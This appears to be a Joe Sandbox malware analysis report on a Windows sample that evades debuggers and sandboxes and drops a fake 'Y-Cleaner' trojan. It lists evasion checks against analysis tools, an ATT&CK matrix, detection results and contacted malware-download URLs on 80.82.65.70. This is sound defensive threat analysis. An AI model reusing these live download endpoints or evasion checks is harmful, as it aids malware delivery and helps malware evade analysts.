Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
Source: C:\Users\user\Desktop\file.exeFile opened: SICE
Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00825DC7 rdtsc 0_2_00825DC7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0C96B push dword ptr fs:[00000030h]0_2_00F0C96B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B30D90 mov eax, dword ptr fs:[00000030h]0_2_04B30D90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B3092B mov eax, dword ptr fs:[00000030h]0_2_04B3092B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EC0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc,0_2_00402EC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004099EA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDA3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A6E0 SetUnhandledExceptionFilter,0_2_0040A6E0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100056A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10002FDA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B39C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04B39C51
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B3A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B3A7B1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B3D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B3D00A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B3A947 SetUnhandledExceptionFilter,0_2_04B3A947
Source: file.exe, file.exe, 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04CF96AC cpuid 0_3_04CF96AC
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004107E2 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_004107E2
Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		24
Virtualization/Sandbox Evasion		LSASS Memory781
Security Software Discovery		Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection		Security Account Manager24
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS3
Process Discovery		Distributed Component Object ModelInput Capture11
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
Software Packing		Cached Domain Credentials223
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe54%VirustotalBrowse
file.exe100%AviraHEUR/AGEN.1320706
file.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dll[1]0%ReversingLabs
C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Bunifu_UI_v1.5.3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://80.82.65.70/files/download0/files/downloadMicrosoft0%VirustotalBrowse
http://80.82.65.70/files/downloadh0%Avira URL Cloudsafe
http://80.82.65.70/files/download0/files/downloadMicrosoft0%Avira URL Cloudsafe
http://80.82.65.70/soft/download;.C0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadns0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadP0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadP0%VirustotalBrowse
http://80.82.65.70/files/downloadPROu=0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadz0%Avira URL Cloudsafe
http://80.82.65.70/soft/download.100%Avira URL Cloudmalware
http://80.82.65.70/files/downloadB0%Avira URL Cloudsafe
http://80.82.65.70/files/download0/files/downloadB0%Avira URL Cloudsafe
http://80.82.65.70/files/download;.C0%Avira URL Cloudsafe
http://80.82.65.70/dll/downloads0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadMicrosoft0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://80.82.65.70/soft/downloadfalse
    		high
    http://80.82.65.70/add?substr=mixtwo&s=three&sub=empfalse
      		high
      http://80.82.65.70/dll/downloadfalse
        		high
        http://80.82.65.70/dll/keyfalse
          		high
          http://80.82.65.70/files/downloadfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://80.82.65.70/files/downloadnsfile.exe, 00000000.00000003.2311558878.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2286381372.0000000005583000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/soft/download;.Cfile.exe, 00000000.00000003.2611753282.0000000005779000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610619412.0000000005779000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/files/download0/files/downloadMicrosoftfile.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2488030998.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/files/downloadhfile.exe, 00000000.00000003.2462863476.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2488030998.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2437588864.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/files/downloadPfile.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://g-cleanit.hkfile.exe, 00000000.00000003.2612845840.0000000005852000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000570D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610182632.0000000005632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2612976400.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611999600.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000580D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613104856.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613359011.0000000005868000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
              		high
              http://80.82.65.70/files/download0/files/downloadfile.exe, 00000000.00000003.2462863476.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2488030998.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://80.82.65.70/files/downloadzfile.exe, 00000000.00000003.2462863476.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336836012.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412397203.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2387108968.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2488030998.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311558878.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2437588864.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361967106.0000000005583000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://upx.sf.netAmcache.hve.6.drfalse
                  		high
                  http://80.82.65.70/soft/download.file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://80.82.65.70/files/downloadPROu=file.exe, 00000000.00000003.2611753282.0000000005779000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2558937779.0000000005779000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610619412.0000000005779000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174file.exe, 00000000.00000003.2612845840.0000000005852000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000570D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610182632.0000000005632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2612976400.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611999600.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000580D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613104856.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613359011.0000000005868000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                    		high
                    http://80.82.65.70/files/downloadBfile.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://iplogger.org/1Pz8p7file.exe, 00000000.00000003.2612845840.0000000005852000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000570D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610182632.0000000005632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2612976400.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611999600.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000580D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613104856.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613359011.0000000005868000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                      		high
                      http://80.82.65.70/files/download0/files/downloadBfile.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://80.82.65.70/dll/downloadsfile.exe, 00000000.00000002.2923721847.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://80.82.65.70/files/download;.Cfile.exe, 00000000.00000003.2558937779.0000000005779000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://80.82.65.70/files/downloadMicrosoftfile.exe, 00000000.00000003.2361967106.0000000005583000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      80.82.65.70
                      		unknownNetherlands
                      		202425INT-NETWORKSCfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1574228
                      Start date and time:2024-12-13 06:11:10 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 25s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.evad.winEXE@2/15@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.12.23.50, 13.107.246.63, 20.231.128.66
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      00:12:29API Interceptor506x Sleep call for process: file.exe modified
                      00:13:29API Interceptor1x Sleep call for process: WerFault.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      80.82.65.70file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                      • 80.82.65.70/soft/download
                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                      • 80.82.65.70/soft/download
                      file.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/soft/download
                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                      • 80.82.65.70/soft/download
                      file.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/soft/download
                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                      • 80.82.65.70/soft/download
                      file.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/soft/download
                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                      • 80.82.65.70/files/download
                      file.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/soft/download
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Stealc, VidarBrowse
                      • 80.82.65.70/soft/download

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      INT-NETWORKSCfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                      • 80.82.65.70
                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                      • 80.82.65.70
                      file.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                      • 80.82.65.70
                      file.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                      • 80.82.65.70
                      file.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      file.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Stealc, VidarBrowse
                      • 80.82.65.70
                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                      • 80.82.65.70

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]file.exeGet hashmaliciousUnknownBrowse
                        file.exeGet hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                            file.exeGet hashmaliciousUnknownBrowse
                              file.exeGet hashmaliciousUnknownBrowse
                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                    Mk4JWS27SO.exeGet hashmaliciousUnknownBrowse
                                      BsVEQQnfyN.exeGet hashmaliciousUnknownBrowse
                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse

                                          Created / dropped Files

                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_fafd47531ab6d510499988ddace487f076f293_c8b7b6aa_d555e0fe-308f-4499-a612-6bdca2a831f6\Report.wer

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.9701431690886135
                                          Encrypted:false
                                          SSDEEP:192:B52h+v8KPiA0u1xSE3judvszuiFJ8Z24IO8ThBV:x5ou1xFjPzuiFJ8Y4IO8r
                                          MD5:0E953A8D2C7DEE845CA385041D4EC681
                                          SHA1:BDE5DE28C0B96D53417B90B5C93C75D64D3E95BE
                                          SHA-256:020705318130DAEC8BEA9B9496AC2E0C5D45E3CEF4C26DC651650943F800E265
                                          SHA-512:95E5888D28F17A4061A5B490D5CBAE54440238DD3AAE6127393837FF394FD8B2AAC56F979B9176EFAE7BF97C32771B9445B0F3C6F6547BCE12B10E46F07D9C4D
                                          Malicious:true
                                          Reputation:low
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.5.4.0.3.8.0.2.6.1.8.8.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.5.4.0.3.8.1.2.3.0.6.3.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.5.5.e.0.f.e.-.3.0.8.f.-.4.4.9.9.-.a.6.1.2.-.6.b.d.c.a.2.a.8.3.1.f.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.e.9.1.c.b.3.f.-.5.8.5.7.-.4.9.2.e.-.9.d.9.7.-.1.4.3.4.8.b.f.1.c.2.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.d.4.-.0.0.0.1.-.0.0.1.4.-.4.b.5.7.-.e.3.8.8.1.d.4.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.1.4.9.7.9.f.a.6.0.7.e.3.8.d.2.7.9.0.5.b.1.f.1.5.1.f.1.c.2.5.8.0.0.0.0.1.5.0.6.!.0.0.0.0.e.f.e.0.9.5.0.8.3.8.1.0.7.6.2.0.5.f.1.b.2.3.a.0.3.b.1.b.a.e.a.6.d.3.6.e.a.a.9.5.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7FA.tmp.dmp

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Fri Dec 13 05:13:00 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):46434
                                          Entropy (8bit):2.5464065656461674
                                          Encrypted:false
                                          SSDEEP:192:iemx+t4DXcOCjvXK0VKtOyoGn/Vx5uomgNzsNmuj98pdmZX2hFAnwCxq7UBS6F6T:3y+moOCjC0ffGn7hs0ABwCs4B1g7kY
                                          MD5:B92EF533FCD7ECB8DE1ACFB4FF96EEA2
                                          SHA1:A730182BEA55C3439EE922428F8F9D9519B40744
                                          SHA-256:D08716AD0DC7DD6CCEEB0B144FDB3706B0CB7F3A113794FF6C714E76EC63F511
                                          SHA-512:8343289FD48D8A943F1F11CBAD29D33E41DE6D9971A973057E63DBB78ECBD66F4F89AC9B610C73D45EF74D9C1FA07504D124D471874990EFE3FB7853BCDCE020
                                          Malicious:false
                                          Reputation:low
